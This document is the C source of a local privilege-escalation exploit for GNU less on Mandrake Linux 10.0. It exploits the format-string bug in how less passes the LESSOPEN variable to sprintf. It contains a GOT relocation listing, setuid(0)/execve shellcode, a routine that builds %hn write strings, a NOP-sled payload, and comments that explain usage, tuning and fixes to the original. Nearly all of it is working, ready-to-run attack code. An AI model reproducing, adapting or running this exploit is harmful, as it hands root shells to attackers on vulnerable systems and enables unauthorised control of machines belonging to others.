GNU less local exploit.
58a7a9a42bea20075104c3381ea5615bb56bb62a0b6c2d5e9eb359d26ba79dc6
/* GNU LESS LOCAL FORMAT STRING EXPLOIT
/usr/bin/less: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0805fd98 R_386_GLOB_DAT __gmon_start__
0805fda0 R_386_COPY ospeed
0805fda2 R_386_COPY PC
0805fda4 R_386_COPY stdin
0805fc94 R_386_JUMP_SLOT fgetc
0805fc98 R_386_JUMP_SLOT tgetnum
0805fc9c R_386_JUMP_SLOT strchr
0805fca0 R_386_JUMP_SLOT getpid
0805fca4 R_386_JUMP_SLOT __ctype_tolower_loc
0805fca8 R_386_JUMP_SLOT tgoto
0805fcac R_386_JUMP_SLOT regexec
0805fcb0 R_386_JUMP_SLOT _longjmp
0805fcb4 R_386_JUMP_SLOT write
0805fcb8 R_386_JUMP_SLOT fileno
0805fcbc R_386_JUMP_SLOT strcmp
0805fcc0 R_386_JUMP_SLOT close
0805fcc4 R_386_JUMP_SLOT getenv
0805fcc8 R_386_JUMP_SLOT signal
0805fccc R_386_JUMP_SLOT regfree
0805fcd0 R_386_JUMP_SLOT pclose
0805fcd4 R_386_JUMP_SLOT tgetflag
0805fcd8 R_386_JUMP_SLOT strerror
0805fcdc R_386_JUMP_SLOT tcsetattr
0805fce0 R_386_JUMP_SLOT setlocale
0805fce4 R_386_JUMP_SLOT __errno_location
0805fce8 R_386_JUMP_SLOT system
0805fcec R_386_JUMP_SLOT popen
0805fcf0 R_386_JUMP_SLOT cfgetospeed
0805fcf4 R_386_JUMP_SLOT time
0805fcf8 R_386_JUMP_SLOT creat64
0805fcfc R_386_JUMP_SLOT tputs
0805fd00 R_386_JUMP_SLOT fgets
0805fd04 R_386_JUMP_SLOT strstr
0805fd08 R_386_JUMP_SLOT strlen
0805fd0c R_386_JUMP_SLOT sleep
0805fd10 R_386_JUMP_SLOT __strtol_internal
0805fd14 R_386_JUMP_SLOT lseek64
0805fd18 R_386_JUMP_SLOT strncmp
0805fd1c R_386_JUMP_SLOT __xstat64
0805fd20 R_386_JUMP_SLOT fsync
0805fd24 R_386_JUMP_SLOT __libc_start_main
0805fd28 R_386_JUMP_SLOT tgetent
0805fd2c R_386_JUMP_SLOT sigsetmask
0805fd30 R_386_JUMP_SLOT strcat
0805fd34 R_386_JUMP_SLOT printf
0805fd38 R_386_JUMP_SLOT memcpy
0805fd3c R_386_JUMP_SLOT open64
0805fd40 R_386_JUMP_SLOT fclose
0805fd44 R_386_JUMP_SLOT __ctype_toupper_loc
0805fd48 R_386_JUMP_SLOT fopen64
0805fd4c R_386_JUMP_SLOT regcomp
0805fd50 R_386_JUMP_SLOT exit
0805fd54 R_386_JUMP_SLOT calloc
0805fd58 R_386_JUMP_SLOT _IO_putc
0805fd5c R_386_JUMP_SLOT free
0805fd60 R_386_JUMP_SLOT ioctl
0805fd64 R_386_JUMP_SLOT isatty
0805fd68 R_386_JUMP_SLOT strncpy
0805fd6c R_386_JUMP_SLOT dup
0805fd70 R_386_JUMP_SLOT _setjmp
0805fd74 R_386_JUMP_SLOT kill
0805fd78 R_386_JUMP_SLOT sprintf <----------------------------
0805fd7c R_386_JUMP_SLOT _IO_getc
0805fd80 R_386_JUMP_SLOT __ctype_b_loc
0805fd84 R_386_JUMP_SLOT tgetstr
0805fd88 R_386_JUMP_SLOT tcgetattr
0805fd8c R_386_JUMP_SLOT read
0805fd90 R_386_JUMP_SLOT __fxstat64
0805fd94 R_386_JUMP_SLOT strcpy
EXAMPLE: the relocation table above is the `objdump -R` output for /usr/bin/less on Mandrake Linux 10.0 (the original line breaks off at "OR."). The GOT slot addresses are specific to that build; on any other target re-read them with `objdump -R /usr/bin/less` and pass the wanted slot on the command line.
The bug is in filename.c: the value of the LESSOPEN environment variable is handed to sprintf() as the format string itself instead of as an argument, so %n-family conversions placed in it write to memory:
<<
sprintf(cmd, lessopen, filename);
>>
Exploitation: set the LESSOPEN environment variable to the format string followed by the payload (main() below builds it: two addresses, two %hn writes, a NOP sled and the shellcode) and run less on some file name, which may be non-existent. Note that the shellcode's setuid(0) only yields root if less itself runs with elevated privileges (setuid root, or via a privileged wrapper); for an unprivileged invocation the call fails silently and the spawned shell runs as the invoking user.
*/
#define _POSIX_C_SOURCE 200809L /* declares setenv() and execl() under -std=c11 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* Scratch buffer that cfstr() formats into and returns a pointer to; main()
 * also uses sizeof(buf) when clearing its own copy. 100 bytes is ample: the
 * string cfstr() builds is 8 address bytes plus two "%.NNNNNx%N$hn" groups. */
char buf[100];
/* 32-byte i386 Linux shellcode: setuid(0) via int 0x80 #23, then
 * execve("/bin//sh", {"/bin//sh", NULL}, NULL) via #11. It contains no 0x00
 * and no '%' (0x25) byte, so it survives being copied with %s, stored in an
 * environment variable and passed through the vulnerable sprintf() unchanged.
 * The setuid(0) result is not checked: if less does not run with elevated
 * privileges it fails silently and the shell has the caller's own uid. */
char shellcode[] = // 1337 unl0ck team small shellcode with setuid(0) ;)
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"  /* xor eax,eax; xor ebx,ebx; mov al,23; int 0x80   -> setuid(0) */
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"  /* xor eax,eax; push eax; push "//sh"                          */
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"  /* push "/bin"; mov ebx,esp; push eax                          */
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; /* push ebx; mov ecx,esp; cdq; mov al,11; int 0x80  -> execve  */
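/*
 * Return the current stack pointer (its low 32 bits). main() uses it as the
 * base from which RET = getsp() + OFFSET is derived: the guess is that the
 * payload placed in less's environment sits at a fixed distance from this
 * process's own stack, which only holds while stack addresses are predictable
 * across processes (i.e. without ASLR).
 *
 * The original had no return statement and relied on the asm leaving the
 * value in %eax; using the result of a function that falls off its end is
 * undefined behaviour in C and may break under optimisation, so the value now
 * comes back through an output operand. This reads %esp, i.e. it is i386 code
 * (the target is elf32-i386, build with -m32); on a 64-bit build it yields
 * only the low half of %rsp.
 */
long getsp(void)
{
    unsigned int sp;

    __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
    return (long)sp;
}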
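/*
 * Build the format string that makes less's sprintf(cmd, lessopen, filename)
 * store the 32-bit value RET into the 4-byte GOT slot at address GOT.
 *
 * Layout of the returned string (glibc printf semantics):
 *   [GOT+2 LE][GOT LE]      8 literal address bytes, copied verbatim by the
 *                           vulnerable sprintf and later consumed as pointers
 *   %.<p1>x%<i1>$hn         pad the output count to the smaller 16-bit half
 *                           of RET, then store the count as a short at the
 *                           i1-th positional argument
 *   %.<p2>x%<i2>$hn         pad up to the larger half and store it too
 * The smaller half is written first so the count only ever grows: no
 * wrap-around arithmetic. p1 is reduced by 8 because the address bytes have
 * already been counted.
 *
 * GOT    address of the 4-byte slot to overwrite (main() passes its slot + 4)
 * RET    value to plant there (guessed address of the NOP sled)
 * ALIGN  printf positional index (%N$) at which the vulnerable sprintf finds
 *        the first address; ALIGN+1 is the second. Target-specific.
 *
 * Returns a pointer to function-local static storage that the next call
 * overwrites; callers copy it (main() does). The original routed this
 * through the global buf[]; the +2 for the high half's slot was also applied
 * to the low byte only, so a carry out of it was lost -- it is now added to
 * the whole address.
 *
 * Caveats the operator must keep in mind:
 * - a zero byte anywhere in GOT or GOT+2 terminates the string early (it is
 *   copied with %s and stored with setenv), so such slots cannot be used;
 * - the smaller half must be >= 8, otherwise a negative precision is emitted;
 * - "%.Nx" prints at least N digits, so if the argument it consumes has more
 *   than N hex digits the count overshoots;
 * - mixing positional (%N$hn) and non-positional (%x) conversions in one
 *   format is undefined by POSIX; glibc accepts it and this relies on that.
 */
char *cfstr(long GOT, long RET, int ALIGN) {
    static char fmt[100];                        /* returned; reused on the next call */
    unsigned long lo_slot = (unsigned long)GOT;  /* receives the low 16 bits of RET  */
    unsigned long hi_slot = lo_slot + 2;         /* receives the high 16 bits of RET */
    int high = (int)((RET >> 16) & 0xffff);
    int low = (int)(RET & 0xffff);
    int first, second, first_idx, second_idx;
    unsigned char addrs[8];

    /* Little-endian pointer to the high half's slot first, then to the low
     * half's slot; the %N$hn indices below refer to them in that order. */
    addrs[0] = (unsigned char)(hi_slot & 0xff);
    addrs[1] = (unsigned char)((hi_slot >> 8) & 0xff);
    addrs[2] = (unsigned char)((hi_slot >> 16) & 0xff);
    addrs[3] = (unsigned char)((hi_slot >> 24) & 0xff);
    addrs[4] = (unsigned char)(lo_slot & 0xff);
    addrs[5] = (unsigned char)((lo_slot >> 8) & 0xff);
    addrs[6] = (unsigned char)((lo_slot >> 16) & 0xff);
    addrs[7] = (unsigned char)((lo_slot >> 24) & 0xff);

    /* Write the smaller half first; its slot decides which pointer index. */
    if (high > low) {
        first = low;
        first_idx = ALIGN + 1;   /* second pointer = GOT, low half */
        second = high;
        second_idx = ALIGN;      /* first pointer = GOT+2, high half */
    } else {
        first = high;
        first_idx = ALIGN;
        second = low;
        second_idx = ALIGN + 1;
    }

    memcpy(fmt, addrs, sizeof addrs);
    snprintf(fmt + sizeof addrs, sizeof fmt - sizeof addrs,
             "%%.%dx%%%d$hn%%.%dx%%%d$hn",
             first - 8, first_idx, second - first, second_idx);
    return fmt;
}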
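/*
 * Entry point.
 *
 *   Usage: <prog> <OFFSET> <GOT>
 *
 *   OFFSET  signed decimal offset added to this process's stack pointer
 *           (getsp()) to form RET, the guessed address of the NOP sled in
 *           less's environment. Found by trial; it depends on this binary's
 *           own frame layout and on stack addresses being predictable
 *           across processes (no ASLR).
 *   GOT     hex address (optional 0x prefix) of a GOT entry of the target
 *           /usr/bin/less. 4 is added before use, so with the sprintf slot
 *           from the listing above (0805fd78) the slot actually overwritten
 *           is the one after it (0805fd7c, _IO_getc in that listing) --
 *           presumably the next PLT call less makes once the vulnerable
 *           sprintf has returned; confirm on the target build.
 *
 * LESSOPEN is set to
 *   <cfstr() format string> "LESS" <0x90 NOP sled> <shellcode>
 * The payload is 999 bytes: the original wrote "LESSFUCK=" and then
 * overwrote everything past the fourth byte with NOPs, so only "LESS"
 * survived; that layout is reproduced so previously tuned OFFSETs still
 * apply. /usr/bin/less is then executed on the non-existent file "a", which
 * makes it run LESSOPEN through sprintf(cmd, lessopen, filename).
 *
 * Fixes over the original: the concatenation buffer was 1000 bytes for a
 * ~1033-byte string (stack overflow in the exploit itself); GOT was parsed
 * with sscanf("%x") into a long and left uninitialised when only one
 * argument was given; setenv() was called twice; less was located through
 * PATH and a shell via system() although the GOT addresses belong to
 * /usr/bin/less specifically; malloc/exit/atoi/setenv were used without
 * their headers.
 *
 * Returns EXIT_FAILURE on bad arguments, an unusable GOT address, setenv or
 * exec failure; on success it does not return (the image is replaced).
 */
int main(int argc, char **argv) {
    enum { PAYLOAD_LEN = 1000, FMT_MAX = 100, ADDR_BYTES = 8, PREFIX_LEN = 4 };
    const int ALIGN = 2;            /* %N$ index of the first address in less's sprintf frame; target-specific */
    const char *enva = "LESSOPEN";
    char *end;

    if (argc < 3) {
        printf("Usage: %s <OFFSET> <GOT>\n", argv[0]);
        return EXIT_FAILURE;
    }

    errno = 0;
    long off = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || errno == ERANGE) {
        printf("[-] bad OFFSET: %s\n", argv[1]);
        return EXIT_FAILURE;
    }
    errno = 0;
    unsigned long got = strtoul(argv[2], &end, 16);   /* accepts "0x..." and bare hex */
    if (end == argv[2] || *end != '\0' || errno == ERANGE) {
        printf("[-] bad GOT: %s\n", argv[2]);
        return EXIT_FAILURE;
    }
    long RET = getsp() + off;
    printf("[~] shellcode addr: 0x%lx, OFFSET: %ld, GOT: 0x%lx\n",
           (unsigned long)RET, off, got);

    /* "LESS" + NOP sled + shellcode + NUL, exactly PAYLOAD_LEN bytes. */
    printf("[~] creating shellcode...\n");
    size_t sc_len = strlen(shellcode);               /* 32; the shellcode has no NUL */
    char payload[PAYLOAD_LEN];
    if (sc_len + PREFIX_LEN >= sizeof payload) {
        printf("[-] shellcode does not fit the payload buffer\n");
        return EXIT_FAILURE;
    }
    memset(payload, 0x90, sizeof payload);
    memcpy(payload, "LESS", PREFIX_LEN);
    memcpy(payload + sizeof payload - 1 - sc_len, shellcode, sc_len);
    payload[sizeof payload - 1] = '\0';

    /* cfstr() starts with 8 address bytes; a shorter string means one of
     * them was zero and the payload would be cut off there. */
    const char *fmt = cfstr((long)got + 4, RET, ALIGN);
    if (strlen(fmt) < ADDR_BYTES) {
        printf("[-] GOT address contains a zero byte, cannot be embedded in %s\n", enva);
        return EXIT_FAILURE;
    }

    printf("[~] creating exploit...\n");
    char exploit[FMT_MAX + PAYLOAD_LEN];
    int n = snprintf(exploit, sizeof exploit, "%s%s", fmt, payload);
    if (n < 0 || (size_t)n >= sizeof exploit) {
        printf("[-] exploit string too long\n");
        return EXIT_FAILURE;
    }

    if (setenv(enva, exploit, 1) != 0) {
        printf("[-] failed! exiting...\n");
        return EXIT_FAILURE;
    }
    printf("[+] var successfully set!\n");

    /* Run the exact binary the GOT listing belongs to, without an
     * intermediate shell; flush first so the messages above are not lost. */
    fflush(stdout);
    execl("/usr/bin/less", "less", "-f", "a", (char *)NULL);
    perror("[-] execl /usr/bin/less");
    return EXIT_FAILURE;
}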